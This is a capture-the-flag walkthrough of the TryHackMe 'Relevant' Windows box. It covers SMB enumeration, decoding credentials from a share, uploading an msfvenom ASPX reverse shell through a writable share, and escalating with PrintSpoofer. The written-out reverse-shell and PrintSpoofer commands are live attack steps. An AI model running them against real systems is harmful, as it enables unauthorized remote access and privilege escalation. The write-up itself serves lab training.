Relevant

https://tryhackme.com/room/relevant

If you see a change of IPs on the victim machine it's because the box disconnected at one point.

User flag

Let's start enumerating services with nmap.

We see there are a few open ports. We can start enumerating the SMB service and see if we find anything interesting.

smbclient -L \\10.10.98.197

Checking the nt4wrksv folder we can see a juicy file. Let's get it.

The passwords are base64 encoded, if we decode them we get these credentials:

Bill - Juw4nnaM4n420696969!$$$
Bob - !P@$$W0rD!123

Trying to log into the machine using Evil-WinRM or psexec with these credentials will get us nowhere so we can assume it's a rabbit hole.

Looking back at our scan report we can see there are two ports using http service, let's take a look.

We see nothing interesting. if we use gobuster against the two http services we'll find nothing really useful on port 80 but we'll find a folder named "nt4wrksv" on port 49663 after a while (Really after a while, it might take 30-40 mins)

Heading to the nt4wrksv folder we find an empty page.

We can try to use gobuster again or we can just check if "passwords.txt" exists to see if it's related to the SMB service.

Bingo. So now we can try to upload anything to the SMB folder and if it works maybe we can get a reverse shell.

It works. Let's try to upload a reverse shell (A reverse.exe shell won't work).

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=9001 -f aspx >reverse.aspx

Let's start a listener and execute the revshell.

Grab the flag.

Root flag

Let's check our privileges

We don't have any tokens to impersonate and DCOM is disabled so we can't use a potato attack. But we can use the PrintSpoofer vuln to abuse "SeImpersonatePrivilege" https://github.com/itm4n/PrintSpoofer

Let's get the PrintSpoofer.exe file and upload it to the victim machine using the SMB service.

Now we have to go to the SMB folder and run the .exe

PrintSpoofer.exe -i -c cmd

We got admin privileges now. Let's grab the flag and we're done.